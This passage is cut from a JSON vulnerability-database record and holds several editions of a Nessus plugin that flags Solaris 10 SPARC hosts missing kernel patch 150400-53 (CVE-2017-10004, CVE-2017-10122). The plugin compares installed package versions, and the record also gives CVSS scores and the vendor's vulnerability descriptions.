(solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWdtrc\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWdtrp\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWefc\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWefcl\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWfmd\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWfss\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWftdur\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWhea\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWhermon\", version:\"11.10.0,REV=2007.06.20.13.33\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWib\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWintgige\", version:\"11.10.0,REV=2005.09.15.00.13\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWiopc\", version:\"11.10.0,REV=2006.07.11.11.28\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWipoib\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWkvm\", version:\"11.10.0,REV=2005.08.04.12.25\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWldomr\", version:\"11.10.0,REV=2006.10.04.00.26\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWldomu\", version:\"11.10.0,REV=2006.08.08.12.13\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWmdb\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWmdbr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWmdr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWmdu\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWmptsas\", version:\"11.10.0,REV=2009.07.14.02.37\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWn2cp\", version:\"11.10.0,REV=2007.07.08.21.44\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWnfsckr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWnfscr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWnfscu\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWnfsskr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWnfssu\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWpd\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWpdu\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWperl584core\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWpiclu\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWpkcs11kms\", version:\"11.10.0,REV=2011.06.03.09.16\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWpmu\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWs8brandr\", version:\"11.10.0,REV=2007.10.08.16.51\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWs8brandu\", version:\"11.10.0,REV=2007.10.08.16.51\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWs9brandr\", version:\"11.10.0,REV=2008.04.24.03.37\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWs9brandu\", version:\"11.10.0,REV=2008.04.24.03.37\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWsmapi\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWssad\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWtoo\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWust1\", version:\"11.10.0,REV=2005.08.10.02.13\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWust2\", version:\"11.10.0,REV=2007.07.08.17.44\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWzfskr\", version:\"11.10.0,REV=2006.05.18.02.15\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWzfsr\", version:\"11.10.0,REV=2006.05.18.02.15\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWzfsu\", version:\"11.10.0,REV=2006.05.18.02.15\") < 0) flag++;\n\nif (flag) {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : solaris_get_report()\n );\n} else {\n patch_fix = solaris_patch_fix_get();\n if (!empty_or_null(patch_fix)) audit(AUDIT_PATCH_INSTALLED, patch_fix, \"Solaris 10\");\n tested = solaris_pkg_tests_get();\n if (!empty_or_null(tested)) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n audit(AUDIT_PACKAGE_NOT_INSTALLED, \"FJSVhea / FJSVmdbr / FJSVpiclu / SUNWarc / SUNWarcr / SUNWbtool / etc\");\n}\n", "title": "Solaris 10 (sparc) : 150400-53", "type": "nessus", "viewCount": 9}, "differentElements": ["description"], "edition": 4, "lastseen": "2018-10-27T06:56:42"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:sun:solaris"], "cvelist": ["CVE-2017-10004", "CVE-2017-10122"], "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Vulnerability in the Solaris component of Oracle Sun Systems Products Suite (subcomponent: Kernel). Supported versions that are affected are 10 and 11. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Solaris executes to compromise Solaris. Successful attacks of this vulnerability can result in takeover of Solaris.\n\nVulnerability in the Solaris component of Oracle Sun Systems Products Suite (subcomponent: Kernel). Supported versions that are affected are 10 and 11. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where Solaris executes to compromise Solaris. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Solaris accessible data.", "edition": 3, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "hash": "0c0ec1f2fa3589ea50742da0e7f1ce83ee87bec59f984bb633cad76f10bbc35f", "hashmap": [{"hash": "be2073bfad5e624acf0f878f09eda795", "key": "naslFamily"}, {"hash": "cfd16da9581e0c21db590e40dfd9e493", "key": "cvss"}, {"hash": "2f557dd1a5dfe7846d859df9ecc45cb4", "key": "cvelist"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "5850355f6181ab9617cc0d094e464031", "key": "modified"}, {"hash": "12350b788e3032906157e11b27b5d136", "key": "cpe"}, {"hash": "a65f3b2757aa383cbd16c808875a4fb9", "key": "href"}, {"hash": "a67a41db6601bfa699ea2bbe6eb36d77", "key": "sourceData"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "16f33654c4ccc8bcf258d99cea152296", "key": "description"}, {"hash": "0e2de2f910ca127ad179eb481fe7c6b1", "key": "references"}, {"hash": "b02ba0108bebf04af1fc81be81a6b920", "key": "pluginID"}, {"hash": "cea8147bf5d9fafd75da0830e93a2ee0", "key": "title"}, {"hash": "5850355f6181ab9617cc0d094e464031", "key": "published"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=107721", "id": "SOLARIS10_150400-53.NASL", "lastseen": "2018-09-02T00:06:48", "modified": "2018-03-12T00:00:00", "naslFamily": "Solaris Local Security Checks", "objectVersion": "1.3", "pluginID": "107721", "published": "2018-03-12T00:00:00", "references": ["https://getupdates.oracle.com/readme/150400-53"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(107721);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2018/03/12 17:45:06\");\n\n script_cve_id(\"CVE-2017-10004\", \"CVE-2017-10122\");\n\n script_name(english:\"Solaris 10 (sparc) : 150400-53\");\n script_summary(english:\"Check for patch 150400-53\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 150400-53\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Vulnerability in the Solaris component of Oracle Sun Systems Products\nSuite (subcomponent: Kernel). Supported versions that are affected are\n10 and 11. Easily exploitable vulnerability allows high privileged\nattacker with logon to the infrastructure where Solaris executes to\ncompromise Solaris. Successful attacks of this vulnerability can\nresult in takeover of Solaris.\n\nVulnerability in the Solaris component of Oracle Sun Systems Products\nSuite (subcomponent: Kernel). Supported versions that are affected are\n10 and 11. Difficult to exploit vulnerability allows high privileged\nattacker with logon to the infrastructure where Solaris executes to\ncompromise Solaris. Successful attacks require human interaction from\na person other than the attacker. Successful attacks of this\nvulnerability can result in unauthorized update, insert or delete\naccess to some of Solaris accessible data.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/150400-53\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Install patch 150400-53\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sun:solaris\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nshowrev = get_kb_item(\"Host/Solaris/showrev\");\nif (empty_or_null(showrev)) audit(AUDIT_OS_NOT, \"Solaris\");\nos_ver = pregmatch(pattern:\"Release: (\\d+.(\\d+))\", string:showrev);\nif (empty_or_null(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Solaris\");\nfull_ver = os_ver[1];\nos_level = os_ver[2];\nif (full_ver != \"5.10\") audit(AUDIT_OS_NOT, \"Solaris 10\", \"Solaris \" + os_level);\npackage_arch = pregmatch(pattern:\"Application architecture: (\\w+)\", string:showrev);\nif (empty_or_null(package_arch)) audit(AUDIT_UNKNOWN_ARCH);\npackage_arch = package_arch[1];\nif (package_arch != \"sparc\") audit(AUDIT_ARCH_NOT, \"sparc\", package_arch);\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWpiclu\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWcslr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWzfskr\", version:\"11.10.0,REV=2006.05.18.02.15\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWnfssu\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWdtrp\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWcry\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWfss\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWs8brandr\", version:\"11.10.0,REV=2007.10.08.16.51\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWib\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWcar\", version:\"11.10.0,REV=2005.08.10.02.13\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWmptsas\", version:\"11.10.0,REV=2009.07.14.02.37\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWs9brandu\", version:\"11.10.0,REV=2008.04.24.03.37\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"FJSVhea\", version:\"11.10.0,REV=2005.01.20.17.25\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWckr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWzfsu\", version:\"11.10.0,REV=2006.05.18.02.15\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWssad\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWftdur\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWpmu\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"FJSVmdbr\", version:\"11.10.0,REV=2005.01.20.17.25\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWnfscr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWcsu\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWefc\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWmdb\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWiopc\", version:\"11.10.0,REV=2006.07.11.11.28\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWcryr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWcpr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWust2\", version:\"11.10.0,REV=2007.07.08.17.44\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWpkcs11kms\", version:\"11.10.0,REV=2011.06.03.09.16\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWipoib\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWnfscu\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWhermon\", version:\"11.10.0,REV=2007.06.20.13.33\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWust1\", version:\"11.10.0,REV=2005.08.10.02.13\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWnfsckr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWldomr\", version:\"11.10.0,REV=2006.10.04.00.26\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWpdu\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWdcar\", version:\"11.10.0,REV=2007.06.20.13.33\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWmdr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWintgige\", version:\"11.10.0,REV=2005.09.15.00.13\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWs9brandr\", version:\"11.10.0,REV=2008.04.24.03.37\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWhea\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWmdu\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWefcl\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWpd\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWnfsskr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWmdbr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWdrcr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWtoo\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"FJSVpiclu\", version:\"11.10.0,REV=2005.01.20.17.25\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWperl584core\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWldomu\", version:\"11.10.0,REV=2006.08.08.12.13\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWzfsr\", version:\"11.10.0,REV=2006.05.18.02.15\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWkvm\", version:\"11.10.0,REV=2005.08.04.12.25\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWfmd\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWbtool\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWsmapi\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWdtrc\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWcsr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWarcr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWcsl\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWs8brandu\", version:\"11.10.0,REV=2007.10.08.16.51\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWn2cp\", version:\"11.10.0,REV=2007.07.08.21.44\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWarc\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWcakr\", version:\"11.10.0,REV=2005.08.25.02.12\") < 0) flag++;\n\nif (flag) {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : solaris_get_report()\n );\n} else {\n patch_fix = solaris_patch_fix_get();\n if (!empty_or_null(patch_fix)) audit(AUDIT_PATCH_INSTALLED, patch_fix, \"Solaris 10\");\n tested = solaris_pkg_tests_get();\n if (!empty_or_null(tested)) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n audit(AUDIT_PACKAGE_NOT_INSTALLED, \"SUNWpiclu / SUNWcslr / SUNWzfskr / SUNWnfssu / SUNWdtrp / SUNWcry / etc\");\n}\n", "title": "Solaris 10 (sparc) : 150400-53", "type": "nessus", "viewCount": 4}, "differentElements": ["modified", "cpe", "sourceData"], "edition": 3, "lastseen": "2018-09-02T00:06:48"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:oracle:solaris:10:150400", "cpe:/o:oracle:solaris:10"], "cvelist": ["CVE-2017-10004", "CVE-2017-10122"], "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Vulnerability in the Solaris component of Oracle Sun Systems Products Suite (subcomponent: Kernel). Supported versions that are affected are 10 and 11. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Solaris executes to compromise Solaris. Successful attacks of this vulnerability 